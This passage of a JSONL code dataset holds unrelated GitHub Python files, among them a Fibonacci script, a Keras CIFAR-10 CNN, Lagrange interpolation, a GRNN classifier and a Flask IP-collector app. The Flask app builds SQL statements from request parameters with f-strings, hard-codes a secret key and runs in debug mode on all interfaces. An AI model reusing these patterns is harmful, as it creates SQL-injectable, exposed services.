}\n","repo_name":"vicmusa/Scripts","sub_path":"awspinpoint/Get_Dynamo_Pimpoint.py","file_name":"Get_Dynamo_Pimpoint.py","file_ext":"py","file_size_in_byte":3476,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"1328104799","text":"n=int(input(\"Enter: \"))\nfibonacci =[0]*30\nfibonacci[1] = fibonacci[2] = 1;\n\ndef fib(n):\n if(n==1 or n==2):\n return 1\n elif(fibonacci[n]!=0):\n return fibonacci[n]\n else:\n fibonacci[n] = fib(n-1)+fib(n-2)\n return fibonacci[n]\n\n\n\nif(n<0):\n print('Invalid Input')\nelse:\n print(fib(n))\n print(fibonacci)","repo_name":"vipray/pythonKePakode","sub_path":"BasicsOfPython/6.3fibonacii.py","file_name":"6.3fibonacii.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"5974517494","text":"\"\"\"This package includes all the modules related to data loading and preprocessing\n To add a custom dataset class called 'dummy', you need to add a file called 'dummy_dataset.py' and define a subclass 'DummyDataset' inherited from BaseDataset.\n You need to implement four functions:\n -- <__init__>: initialize the class, first call BaseDataset.__init__(self, opt).\n -- <__len__>: return the size of dataset.\n -- <__getitem__>: get a data point from data loader.\n -- : (optionally) add dataset-specific options and set default options.\nNow you can use the dataset class by specifying flag '--dataset_mode dummy'.\nSee our template dataset class 'template_dataset.py' for more details.\n\"\"\"\nimport importlib\nfrom games.base_game import BaseGame\n\n\ndef find_game_using_name(game_name):\n \"\"\"Import the module \"games/[game_name]_game.py\".\n In the file, the class called [GameName]Game() will\n be instantiated. It has to be a subclass of BaseGame,\n and it is case-insensitive.\n \"\"\"\n game_filename = \"games.\" + game_name + \"_game\"\n gamelib = importlib.import_module(game_filename)\n\n game = None\n target_game_name = game_name.replace('_', '') + 'game'\n for name, cls in gamelib.__dict__.items():\n if name.lower() == target_game_name.lower() \\\n and issubclass(cls, BaseGame):\n game = cls\n\n if game is None:\n raise NotImplementedError(\"In %s.py, there should be a subclass of BaseGAME with class name that matches %s in lowercase.\" % (game_filename, target_game_name))\n\n return game\n\n\ndef get_option_setter(game_name):\n \"\"\"Return the static method of the dataset class.\"\"\"\n game_class = find_game_using_name(game_name)\n return game_class.modify_commandline_options\n\n\ndef create_game(opt):\n \"\"\"Create a game given the option.\n This is the main interface between this package and 'train.py'/'test.py'\n Example:\n >>> from games import create_game\n >>> game = create_game(opt)\n \"\"\"\n game = find_game_using_name(opt.game)\n instance = game(opt)\n print(\"game of [%s] was set\" % type(instance).__name__)\n return instance\n\n","repo_name":"jimmy-academia/AlphaZero-Pytorch-Go-Mahjong","sub_path":"games/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2256,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"15120501361","text":"from __future__ import division\nfrom pathlib import Path\nimport time\n\nimport keras\nfrom keras.datasets import cifar10\nfrom keras.utils import np_utils\nfrom keras.models import Sequential\nfrom keras.layers import Dense, Activation, Conv2D, MaxPooling2D, Flatten\nfrom keras.models import model_from_json #to load a model from a json file.\nimport matplotlib\nmatplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nfrom scipy.misc import toimage\n# from sklearn.metrics import classification_report, confusion_matrix\nimport numpy as np\nnp.random.seed(12345678)\n\n\n\n#NN architecture\nn_hlayers = 5\nn_neurons = 401\ninitial_neurons = 128\nneurons = 200\n# layers = 10\nneurons_step = 20\nn_epochs= 20\nn_batch_size= 128\ndropout_list = [0.0, 0.2, 0.4, 0.6]\ndropout = 0.\nkernel_initializer_list = ['random_normal', 'glorot_normal', 'he_normal']\nkernel_initializer = 'glorot_normal'\n\n#global variables\nplots_folder = Path(\"plots/fine_tune_cnn\")\nmodels_folder = Path(\"models/\")\ndataset_name = \"cifar\"\noriginal_model_name = 'cnn_{}'.format(dataset_name)\nimgs_folder = Path(\"imgs/\")\ncifar_fnn_total_history = []\ntext_file = \"CIFAR-CNN score file.txt\"\n\nlayers_accuracy = []\nneurons_accuracy = []\nkernel_accuracy = []\noptimizer_accuracy = []\n\nif __name__==\"__main__\":\n start_time = time.clock()\n print(\"Using keras version {0}\".format(keras.__version__))\n\n # Load the MNIST dataset\n (x_train, y_train), (x_test, y_test) = cifar10.load_data() # loading of MNIST dataset\n\n # check sizes\n print(\"\\n\")\n print(\"Number of training examples: '{0}'\".format(x_train.shape[0]))\n print(\"Number of test examples: '{0}'\".format(x_test.shape[0]))\n print(\"Size of train samples: '{0}'\".format(x_train.shape[1:]))\n\n # Data to 1D and normalization\n #x_train = x_train.reshape(60000, 784) # 60000 observations of 784 features\n #x_test = x_test.reshape(10000, 784) # 10000 observations of 784 features\n\n x_train = x_train.astype('float32')\n x_test = x_test.astype('float32')\n x_train = x_train / 255\n x_test = x_test / 255\n\n train_input_shape = x_train.reshape(*x_train.shape)\n test_input_shape = x_test.reshape(*x_test.shape)\n\n # Adapts labels to one hot encoding vector for softmax classifier\n y_train = np_utils.to_categorical(y_train, 10)\n y_test = np_utils.to_categorical(y_test, 10)\n\n # Neural network architecture\n # CNN\n nn = Sequential()\n nn.add(Conv2D(32, kernel_size=(3,3),kernel_initializer=kernel_initializer, activation = 'relu', input_shape=x_train.shape[1:]))\n nn.add(MaxPooling2D(pool_size=(2,2)))\n nn.add(Conv2D(64,(3,3),kernel_initializer=kernel_initializer, activation = 'relu'))\n nn.add(MaxPooling2D(pool_size=(2,2)))\n nn.add(Flatten())\n nn.add(Dense(128,kernel_initializer=kernel_initializer, activation='relu'))\n nn.add(Dense(10,kernel_initializer=kernel_initializer, activation='softmax'))\n\n # Model visualization\n # The plot of the model needs pydot, graphviz and pydot-ng\n #plot_model(nn, to_file='nn.png', show_shapes=True)\n\n # Compile the model\n for (optimizer, optimizer_name) in zip([keras.optimizers.SGD(),\n keras.optimizers.Adam(),\n keras.optimizers.Adam(lr=0.001, beta_1=0.9, beta_2=0.995, epsilon=1e-08, decay=0.0005),\n keras.optimizers.Adam(amsgrad= True),\n keras.optimizers.Adagrad(),\n keras.optimizers.Nadam(),\n keras.optimizers.RMSprop(),\n keras.optimizers.Adamax()],\n [\"SGD\",\"Adam_Default\", \"Adam_custom\", \"Adam_amsgrad\", \"Adagrad\",\n \"Nadam\", \"RMSprop\", \"Adamax\"]):\n\n nn.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])\n model_name = original_model_name\n model_name = model_name + optimizer_name\n\n history = nn.fit(x_train, y_train, validation_data=(x_test, y_test), batch_size=n_batch_size, epochs=n_epochs)\n\n # Evaluate the model\n score = nn.evaluate(x_test, y_test, verbose=0)\n\n # Store plots\n # Accuracy plot\n plt.plot(history.history['acc'])\n plt.plot(history.history['val_acc'])\n plt.title('model accuracy')\n plt.ylabel('accuracy')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plot_name = plots_folder /'model_accuracy_{0}'.format(model_name)\n plt.savefig(str(plot_name))\n plt.close()\n # Loss plot\n plt.plot(history.history['loss'])\n plt.plot(history.history['val_loss'])\n plt.title('model loss')\n plt.ylabel('loss')\n plt.xlabel('epoch')\n plt.legend(['train', 'test'], loc='upper left')\n plot_name = plots_folder / 'model_loss_{0}'.format(model_name)\n plt.savefig(str(plot_name))\n plt.close()\n\n # Confusion Matrix\n # Compute probabilities\n # Y_pred = nn.predict(x_test)\n # # Assign most probable label\n # y_pred = np.argmax(Y_pred, axis=1)\n # # Plot statistics\n # print('Analysis of results')\n # target_names = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n # print(classification_report(np.argmax(y_test, axis=1), y_pred, target_names=target_names))\n # print(confusion_matrix(np.argmax(y_test, axis=1), y_pred))\n #\n # # Saving model and weights\n # nn_json = nn.to_json()\n # json_file_name = '{0}.json'.format(model_name)\n # with open(models_folder / json_file_name, 'w') as json_file:\n # json_file.write(nn_json)\n # weights_file_name = \"weights-{0}_\".format(model_name) + str(score[1]) + \".hdf5\"\n # weights_file = models_folder / weights_file_name\n # nn.save_weights(str(weights_file), overwrite=True)\n #\n # # Loading model and weights\n # json_file = open(models_folder / json_file_name, 'r')\n # nn_json = json_file.read()\n # json_file.close()\n # nn = model_from_json(nn_json)\n # nn.load_weights(weights_file)\n\n #measuring execution time\n print(\"Total execution time {} seconds\".format(time.clock() - start_time))","repo_name":"Afrojam/deep_learning","sub_path":"class_01_mlp_and_cnn/CIFAR10_cnn.py","file_name":"CIFAR10_cnn.py","file_ext":"py","file_size_in_byte":6197,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"36442810568","text":"import numpy as np\nfrom sympy import *\nfrom sympy.parsing.sympy_parser import parse_expr\nimport math\n\nclass InterpolacionLagrange:\n\n def __init__(self, n, x, y):\n\n self.n = n\n self.x = x\n self.y = y\n self.proceso = []\n def lagrange(self):\n self.n = int(self.n)\n polinomio = \"\"\n F = Function('F')\n G = Function('G')\n print(\"\\n----------------------------FORMA ESQUEMATICA POLINOMIO DE LAGRANGE---------------------------\\n\\n----------------- P(X) = L0(X)F(X0) + L1(X)F(X1) + L2(X)F(X2) + ... + LN(X)F(XN)---------------\")\n for i in range(self.n):\n L = \"(\"\n for j in range(self.n):\n if (j != i):\n L += \"(x - \" + str(self.x[j]) + \")\"\n L += \")\"\n L += \" / (\"\n for j in range(self.n):\n if (j != i):\n L += \"(\" + str(self.x[i]) + \" - \" + str(self.x[j]) + \")\"\n\n L += \")\"\n L = L.replace(\")(\",\")*(\")\n F = parse_expr(L)\n self.proceso.append(\"\\n L\" + str(i) + \"(x) = \" + L.replace(\"((\",\"(\").replace(\"))\",\")\") + \" = \" + str(expand(F)))\n if i == self.n-1:\n polinomio += \"(\" + str(expand(F)) + \")*\" + str(self.y[i])\n else:\n polinomio += \"(\" + str(expand(F)) + \")*\" + str(self.y[i]) + \" + \"\n\n G = (\"P(x) =\" + str(expand(polinomio)))\n print(\"\\n-----------------------------------POLINOMIO INTERPOLANTE DE LAGRANGE --------------------------------\\n \\n\" + \"P(X) = \" + str(G))\n return G\n\n \n\n\n","repo_name":"jlondo97/Proyecto_numerico","sub_path":"app/src/metodos/Interpolacion/interpolacionLagrange.py","file_name":"interpolacionLagrange.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8374357961","text":"# -*- mode: python ; coding: utf-8 -*-\n# !!! create virtualenv to disable TQDM unused module\n\nblock_cipher = None\n\napp_name = 'mdict'\npkg_path = 'mdict_utils'\n\nscript_path = os.path.join(workpath, f'{app_name}-script.py')\n\nwith open(script_path, 'wt') as f:\n f.write(f'import {pkg_path}.__main__\\n{pkg_path}.__main__.run()')\n\na = Analysis([script_path],\n pathex=['.'],\n binaries=[],\n datas=[],\n hiddenimports=['pkg_resources.py2_warn'],\n hookspath=[],\n runtime_hooks=[],\n excludes=[],\n win_no_prefer_redirects=False,\n win_private_assemblies=False,\n cipher=block_cipher,\n noarchive=False)\n\npyz = PYZ(a.pure, a.zipped_data,\n cipher=block_cipher)\n\nif False: # one folder\n exe = EXE(pyz,\n a.scripts,\n [],\n exclude_binaries=True,\n name=app_name,\n debug=False,\n bootloader_ignore_signals=False,\n strip=False,\n upx=True,\n console=True )\n coll = COLLECT(exe,\n a.binaries,\n a.zipfiles,\n a.datas,\n strip=False,\n upx=True,\n upx_exclude=[],\n name=app_name)\nelse: # onefile\n exe = EXE(pyz,\n a.scripts,\n a.binaries,\n a.zipfiles,\n a.datas,\n name=app_name,\n debug=False,\n strip=False,\n upx=True,\n runtime_tmpdir=None,\n console=True )\n","repo_name":"dlxj/doc","sub_path":"lang/programming/python/mdict-utils/mdict_utils.spec","file_name":"mdict_utils.spec","file_ext":"spec","file_size_in_byte":1588,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"} +{"seq_id":"39402378158","text":"from django.urls import path\n\nfrom myapp.views import active_report\nfrom . import views\n\napp_name = 'myapp'\nurlpatterns = [\n path('leaverequest/', views.LeaveRequestCreate.as_view(), name='leaverequest'),\n path('', views.Home.as_view(), name='home'),\n path('leave-list', views.LeaveList.as_view(), name='leave-list'),\n path('profile//', views.Profile.as_view(), name='profile'),\n path('wfh_create/', views.WorkFromHomeCreate.as_view(), name='wfh_create'),\n path('annual_leave/', views.AnnualLeaveList.as_view(), name='annual_leave'),\n path('leave_create/', active_report, name='active_leave'),\n path('home/', views.HomeForUser.as_view(), name='home2'),\n]\n","repo_name":"SivakumarSkr/LeaveRegister","sub_path":"myapp/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":687,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"42472851755","text":"from flask import Flask, request, jsonify\nimport os, multiprocessing, string, random, time, argparse, json\nimport logging as logger\nimport sqlite3\n\nRUN_IN_DEBUG_MODE = os.environ.get('RUN_IN_DEBUG_MODE', False)\nPORT = os.environ.get(\"PORT\", 8000)\nLOG_DIR = os.environ.get(\"LOG_DIR\", \"./logs\")\n\nif not os.path.isdir(\"./logs\"):\n logger.info(f\"Creating {LOG_DIR} dir\")\n os.mkdir(\"./logs\")\n\nlogger.basicConfig(level=\"INFO\")\n\n\napp=Flask(__name__)\n\napp.secret_key=\"veryV#3rySc67eTkey\"\n\nglobal taskQueue\n\ndef getDBConnector():\n return sqlite3.connect('ipAddresses.db')\n\ndef intIPDatabase():\n DB_CONNECTION = getDBConnector()\n\n try:\n logger.info(\"DB Connection opened successfully.\")\n except Exception as e:\n logger.info(\"Error in opening DB Connection.\")\n logger.error(e)\n\n\n try: \n DB_CONNECTION.execute('''\n CREATE TABLE IF NOT EXISTS ip_address(\n ID INT PRIMARY KEY NOT NULL,\n DEVICE_NAME TEXT NOT NULL UNIQUE,\n DEVICE_IP TEXT NOT NULL\n );\n ''')\n logger.info(\"Ran create table query successfully\")\n except Exception as e:\n logger.info(\"Error in running create table query successfully\")\n logger.error(e)\n\n DB_CONNECTION.close()\n\ndef addIPToTable(IP, device_name):\n status = False\n conn = getDBConnector()\n\n try:\n conn.execute(f\"INSERT INTO ip_address (ID,DEVICE_NAME,DEVICE_IP) VALUES ('{getUid()}', '{device_name}', '{IP}');\")\n conn.commit()\n logger.info(\"Records created successfully\")\n status = True\n except Exception as e:\n logger.info(\"Adding record failed.\")\n logger.error(e)\n\n conn.close()\n return status\n\ndef updateIPAddress(IP, device_name):\n status = False\n conn = getDBConnector()\n\n try:\n conn.execute(f\"UPDATE ip_address set DEVICE_IP = '{IP}' where DEVICE_NAME = '{device_name}'\")\n conn.commit()\n logger.info(\"Records created successfully\")\n status = True\n except Exception as e:\n logger.info(\"Adding record failed.\")\n logger.error(e)\n\n conn.close()\n return status\n\ndef getIPdata():\n conn = getDBConnector()\n cursor = None\n out = {}\n\n try:\n cursor = conn.execute(\"SELECT ID, DEVICE_NAME, DEVICE_IP from ip_address\")\n except Exception as e:\n logger.info(\"Fetching records failed.\")\n logger.error(e)\n return \"Error in fetching data from database.\"\n\n for row in cursor:\n out[\"id\"] = row[0]\n out[\"device_id\"] = row[1]\n out[\"device_ip\"] = row[2]\n\n conn.close()\n\n return out\n\n\ndef getUid(noOfCharecters=6):\n chars = string.ascii_letters + string.digits\n uid = ''.join(random.choice(chars) for n in range(noOfCharecters))\n return uid\n\ndef isValid(IP):\n def isIPv4(s):\n try: return str(int(s)) == s and 0 <= int(s) <= 255\n except: return False\n \n def isIPv6(s):\n if len(s) > 4:\n return False\n try : return int(s, 16) >= 0 and s[0] != '-'\n except:\n return False\n\n if IP.count(\".\") == 3 and all(isIPv4(i) for i in IP.split(\".\")):\n return True\n\n if IP.count(\":\") == 7 and all(isIPv6(i) for i in IP.split(\":\")):\n return True\n return False\n\n@app.route('/', methods = ['GET'])\ndef stats():\n return jsonify(getIPdata())\n\n@app.route('/health', methods = ['GET'])\ndef health():\n return \"ok\"\n\n@app.route('/myipis', methods = ['GET'])\ndef addmyip():\n IP = None\n if \"ip\" not in request.args:\n return \"IP address not given\", 422\n \n if \"device_id\" not in request.args:\n return \"device name not given\", 422\n\n IP = request.args.get(\"ip\")\n device_id = request.args.get(\"device_id\")\n\n\n if isValid(IP):\n if addIPToTable(IP, device_id):\n return \"IP address Saved.\"\n else:\n return \"Failed\", 500\n else:\n return \"Invalid IP.\", 422\n\n@app.route('/myipis', methods = ['PATCH'])\ndef updatemyip():\n IP = None\n if \"ip\" not in request.args:\n return \"IP address not given\", 422\n\n if \"device_id\" not in request.args:\n return \"device name not given\", 422\n\n IP = request.args.get(\"ip\")\n device_id = request.args.get(\"device_id\")\n\n if isValid(IP):\n if updateIPAddress(IP, device_id):\n return \"IP address Updated.\"\n else:\n return \"Failed\", 500\n\n else:\n return \"Invalid IP.\", 422\n\ndef queueMonitor():\n\n while True:\n if not taskQueue.empty():\n print(\"Found a task.\")\n try:\n task = taskQueue.get()\n except Exception as e:\n pass\n else:\n time.sleep(0.1)\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n parser.add_argument('--PORT', help = \"port to run\", default = PORT)\n args = parser.parse_args()\n\n manager = multiprocessing.Manager()\n taskQueue = manager.Queue()\n\n queueMonitor = multiprocessing.Process(name = \"queueMonitor\", target = queueMonitor)\n\n print(\"Starting queue monitor.\")\n # queueMonitor.start()\n\n intIPDatabase()\n app.run(debug=True, host='0.0.0.0', port=args.PORT)\n \n","repo_name":"SREENATHPGS/autocloud","sub_path":"ipCollector/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"16220652178","text":"\"\"\"GRNN implementation for fine-grained emotion classification.\"\"\"\n\"\"\"We use various other data instead of twitter data annotated and used in the\npaper. Furthermore, Ekman's emotion set is used instead of emotion categories\n defined by Plutchik.\"\"\"\n\nimport sys\nimport os\nimport time\nimport json\nimport pickle\nimport torch\nimport torch.nn as nn\nfrom torch.autograd import Variable\nimport torch.nn.functional as F\nfrom torch import optim\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom preprocess import *\nfrom utils import *\nos.environ['CUDA_VISIBLE_DEVICES'] = '1'\n\nclass GRNN(nn.Module):\n def __init__(self, input_size, embedding_size, mini_batch_size, hidden_size,\n label_size, MAX_LENGTH, n_layer=1, CUDA_use=False):\n super(GRNN, self).__init__()\n self.input_size = input_size\n self.embedding_size = embedding_size\n self.mini_batch_size = mini_batch_size\n self.hidden_size = hidden_size\n self.label_size = label_size\n self.MAX_LENGTH = MAX_LENGTH\n self.n_layer = n_layer\n self.CUDA_use = CUDA_use\n\n self.embedding = nn.Embedding(input_size, embedding_size)\n self.gru = nn.GRU(embedding_size, hidden_size, n_layer, dropout=0.1)\n self.out = nn.Linear(hidden_size, label_size)\n #self.softmax = nn.LogSoftmax()\n\n def forward(self, batch_word_seq, hidden):\n # batch_word_seq is a variable\n batch_size = batch_word_seq.size()[0]\n seq_len = batch_word_seq.size()[1]\n embedded = self.embedding(batch_word_seq).view(seq_len, batch_size, -1)\n output, hidden = self.gru(embedded, hidden)\n #seq_len, batch, hidden_size -> batch, hidden_size\n # use last output\n output = output[-1].view(batch_size, -1)\n output = self.out(output)\n #batch, label_size\n return output\n\n def init_hidden(self, mini_batch_size):\n if self.CUDA_use:\n hidden = Variable(torch.zeros(self.n_layer, mini_batch_size,\n self.hidden_size)).cuda()\n else:\n hidden = Variable(torch.zeros(self.n_layer, mini_batch_size,\n self.hidden_size))\n return hidden\n\ndef train(grnn, grnn_optimizer, criterion, input_variables, labels):\n #input_variables = batch(1) * seq_len\n batch_size = input_variables.size()[0]\n grnn_init_hidden = grnn.init_hidden(batch_size)\n grnn_optimizer.zero_grad()\n output = grnn(input_variables, grnn_init_hidden)\n # output shape = batch, label_size\n loss = criterion(output, labels)\n loss.backward()\n grnn_optimizer.step()\n return loss.data[0]/(batch_size*1.)\n\ndef test(grnn, test_variables, test_labels):\n grnn.train(False)\n batch_size = test_variables.size()[0] #1\n grnn_init_hidden = grnn.init_hidden(batch_size)\n output = grnn(test_variables, grnn_init_hidden)\n softmax = nn.LogSoftmax()\n output = softmax(output)\n acc = 0\n for oi in range(batch_size):\n topv, topi = output[oi].data.topk(1)\n predicted = topi[0]\n if predicted == test_labels.data[0]:\n acc += 1\n return acc / batch_size*1., predicted\n\ndef confusionMatrix(y_pred, y_true, fname):\n mat = confusion_matrix(y_true, y_pred)\n precision, recall, fscore, _ = \\\n precision_recall_fscore_support(y_true, y_pred)\n with open(fname, 'w') as f:\n for row in mat:\n for num in row:\n f.write(str(num) + '\\t')\n f.write('\\n')\n f.write('\\n')\n for idx, item in enumerate(precision):\n f.write(str(item)+'\\t'+str(recall[idx])+'\\t'+str(fscore[idx])+'\\n')\n\nif __name__ == \"__main__\":\n CUDA_use = True\n UNK_token = 0\n n_epoch = 14\n n_iter = 100\n n_layer = 3\n embedding_size = 300\n hidden_size = 1000\n mini_batch_size = 1\n learning_rate = 0.0001\n MAX_LENGTH = 30\n data_name = 'bopang'\n blogs_data = '/Users/jaeickbae/Documents/projects/2017 Affective Computing\\\n/Emotion-Data/Benchmark/category_gold_std.txt'\n bopang_data = '/Users/jaeickbae/Documents/projects/data/bopang_twitter/rt-polaritydata'\n\n # get data\n train_input_var, train_output_label, test_input_var,\\\n test_output_label, test_sentence, train_input = \\\n prepareData(data_name , bopang_data, CUDA_use, MAX_LENGTH)\n\n train_output_label = Variable(torch.LongTensor(train_output_label))\n test_output_label = Variable(torch.LongTensor(test_output_label))\n if CUDA_use:\n train_output_label = train_output_label.cuda()\n test_output_label = test_output_label.cuda()\n\n label_size = len(train_input.tag2idx)\n # define model, criterion, and optimizer\n grnn = GRNN(train_input.n_words, embedding_size, mini_batch_size,\\\n hidden_size, label_size, MAX_LENGTH, n_layer, CUDA_use)\n if CUDA_use:\n grnn = grnn.cuda()\n criterion = nn.CrossEntropyLoss()\n grnn_optimizer = torch.optim.Adam(grnn.parameters(), lr=learning_rate)\n\n # train\n print(\"Training...\")\n start = time.time()\n plot_losses = []\n plot_loss_total = 0\n print_loss_total = 0\n print_every = 1000\n plot_every = 100\n n_iter = 0\n for epoch in range(n_epoch):\n for i, sentences in enumerate(train_input_var):\n n_iter += 1\n loss = train(grnn, grnn_optimizer, criterion, sentences,\\\n train_output_label[i])\n print_loss_total += loss\n plot_loss_total += loss\n\n if (n_iter) % print_every == 0:\n print_loss_avg = print_loss_total / (print_every*1.)\n print_loss_total = 0\n print('%s (%d %d%%) %.4f' % ((timeSince(start, n_iter/\n (len(train_input_var)*n_epoch*1.))), n_iter,\n n_iter/(len(train_input_var)*n_epoch*1.)*100, print_loss_avg))\n\n if n_iter % plot_every == 0:\n plot_loss_avg = plot_loss_total / (plot_every*1.)\n plot_losses.append(plot_loss_avg)\n plot_loss_total = 0\n fname = data_name + str(MAX_LENGTH)\n showPlot(plot_losses, fname + '_loss.png')\n\n torch.save(grnn.state_dict(), fname + '_model.pkl')\n\n # test\n print(\"Start Testing...\")\n test_acc_total = 0\n y_pred = []\n for i in range(len(test_input_var)):\n acc, predicted = test(grnn, test_input_var[i], test_output_label[i])\n test_acc_total += acc\n y_pred.append(predicted)\n print('acc: ' + str(test_acc_total / (len(test_input_var)*1.)))\n y_true = [label.data[0] for label in test_output_label]\n confusionMatrix(y_pred, y_true, fname +'_confusion.txt')\n","repo_name":"SnowIsWhite/EmoNet-PyTorch","sub_path":"grnn.py","file_name":"grnn.py","file_ext":"py","file_size_in_byte":6596,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"72282962332","text":"from django.http import JsonResponse\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\n\n\nclass TemplateRender(TemplateView):\n\n def get_template_names(self):\n path = self.request.path\n if path == '/':\n path = \"index.html\"\n return [f\"maqueta/{path}\"]\n\n def post(self):\n return JsonResponse({}, status=200)\n\n\ndef front_context(request):\n def looper(length):\n for loop in range(length):\n yield loop\n _loops = [\n 2, 4, 6, 8, 10, 12, 16, 32, 64,\n 3, 5, 7, 9, 11, 13, 15, 25, 50,\n ]\n context = dict()\n for loop in _loops:\n context[f\"looper_{loop}\"] = looper(loop)\n return context\n","repo_name":"ccapudev/django-boilerplate","sub_path":"apps/core/utils/development.py","file_name":"development.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"32"} +{"seq_id":"70288618651","text":"\nx = 2\ny = 3\nz = x + y\nprint(\"Ther result: \", z)\n\ns = 'Mahmoud'\nl = 'Salem'\nprint(\"My name is\", s, l)\n\nprint(s[0], l[0], l[1:4], s[3:])\n\n","repo_name":"ma7salem/python-fundamentals","sub_path":"#1 variable/demo.py","file_name":"demo.py","file_ext":"py","file_size_in_byte":137,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"12723525747","text":"import curses\n\nfrom imediff.utils import _, console_width, error_exit, logger, write_file\nfrom imediff.config import cc\nfrom imediff.cli import *\n\n# Format stings\n_helptext2 = _(\n \"\"\"\\\n Interactive Merge Editor to merge 2 DIFFerent files\n\nimediff merges 2 different input files using 5 modes:\n * mode a: display {file_a} (older) in {color_a}\n * mode b: display {file_b} (newer) in {color_b}\n * mode d: display diff2(a,b) by line in {color_d}\n * mode e: display editor result buffer in {color_e}\n * mode f: display wdiff2(a,b) by character in {color_f}\n\nkey commands induced actions\n{w:c},{x:c} write and exit\n{q:c} quit without saving\n{a:c}/{b:c}/{d:c}/{e:c}/{f:c} set a chunk to a/b/d/e/f mode\n1/2/4/5/6 set a chunk to a/b/d/e/f mode (alternative)\n{A:c}/{B:c}/{D:c}/{E:c}/{F:c} set all chunks to a/b/d/e/f mode\nenter toggle mode of a chunk\n{m:c} modify a chunk with editor: {edit_cmd}\n{M:c} remove a editor result buffer\narrows/pgdn,{j:c}/pgup,{k:c} move scope of the display\nspace,{n:c} /backspace,{p:c} select the next/previous chunk\ntab,{N:c} /shift-tab,{P:c} select the next/previous diff chunk\nhome,{t:c} /end,{z:c} select the first/last chunk\n{T:c} /{Z:c} select the first/last diff chunk\n?,{s:c} show the state of the merge\n{h:c} show this help\n{H:c} show tutorial\"\"\"\n)\n\n_helptext3 = _(\n \"\"\"\\\n Interactive Merge Editor to merge 3 DIFFerent files\n\nimediff merges 3 different input files using 7 modes:\n * mode a: display {file_a} (yours) in {color_a}\n * mode b: display {file_b} (base) in {color_b}\n * mode c: display {file_c} (their) in {color_c}\n * mode d: display diff3(a,b,c) by line in {color_d}\n * mode e: display editor result buffer in {color_e}\n * mode f: display wdiff3(a,b,c) by character in {color_f}\n * mode g: set good mode from (a,b,c,e,g) if merged cleanly, or\n set mode (df) in case of conflicts\n\nkey commands induced actions\n{w:c},{x:c} write and exit\n{q:c} quit without saving\n{a:c}/{b:c}/{c:c}/{d:c}/{e:c}/{f:c}/{g:c} set a chunk to a/b/c/d/e/f/g mode\n1/2/3/4/5/6/7 set a chunk to a/b/c/d/e/f/g mode (alternative)\n{A:c}/{B:c}/{C:c}/{D:c}/{E:c}/{F:c}/{G:c} set all chunks to a/b/c/d/e/f/g mode\nenter toggle mode of a chunk\n{m:c} modify a chunk with editor: {edit_cmd}\n{M:c} remove a editor result buffer\narrows/pgdn,{j:c}/pgup,{k:c} move scope of the display\nspace,{n:c} /backspace,{p:c} select the next/previous chunk\ntab,{N:c} /shift-tab,{P:c} select the next/previous diff chunk\nhome,{t:c} /end,{z:c} select the first/last chunk\n{T:c} /{Z:c} select the first/last diff chunk\n?,{s:c} show the state of the merge\n{h:c} show this help\n{H:c} show tutorial\"\"\"\n)\n\n_stattext0 = _(\n \"\"\"\\\nChunk index = (all files are identical)\nLine index ={row: 5d} (total ={conth: 5d})\nColumn offset ={col: 5d}\"\"\"\n)\n\n_stattext1 = _(\n \"\"\"\\\nChunk index ={active: 5d} (total ={total: 5d}, unresolved ={unresolved: 5d})\nLine index ={row: 5d} (total ={conth: 5d})\nColumn offset ={col: 5d}\"\"\"\n)\n\n# Keep this under 74 char/line for better looks\n_nonclean = _(\n \"\"\"\\\nThis requirement of the clean merge for 'save and exit' can be disabled by\nspecifying the \"--sloppy\" option to the imediff command. Alternatively,\nyou can effectively evade this requirement by pressing \"m\" on all\nnon-clean merges to make them as the manually edited text data.\"\"\"\n)\n\n# Keep this under 74 char/line for better looks\n# I need this hack to avoid translation of tutorial for now. XXX FIXME XXX\nnonclean = \"\"\"\\\nThis requirement of the clean merge for 'save and exit' can be disabled by\nspecifying the \"--sloppy\" option to the imediff command. Alternatively,\nyou can effectively evade this requirement by pressing \"m\" on all\nnon-clean merges to make them as the manually edited text data.\"\"\"\n\n\n# Keep this under 76 char/line to fit this in the 80 char terminal\n_tutorial = \"\"\"\\\nQuick start:\n In this tutorial screen, use pgdn/pgup/arrows keys to read it, or\n type other keys to return to the main imediff screen.\n\n---------------------------------------------------------------------------\n Tutorial for imediff (Interactive Merge Editor)\n Copyright (C) 2021 Osamu Aoki \n---------------------------------------------------------------------------\n\nThe imediff command helps you to merge 2 slightly different files with an\noptional base file interactively using the in-place alternating display of\nthe changed content on a single-pane full screen terminal user interface.\n\nThe source of line is clearly identified by the color of the line or the\nidentifier character at the first column.\n\nThe advantage of this user interface is the minimal movement of the line of\nsight for the user. Other great tools such as vimdiff, xxdiff, meld and\nkdiff3 require you to look at different points of display to find the exact\nposition of changes. 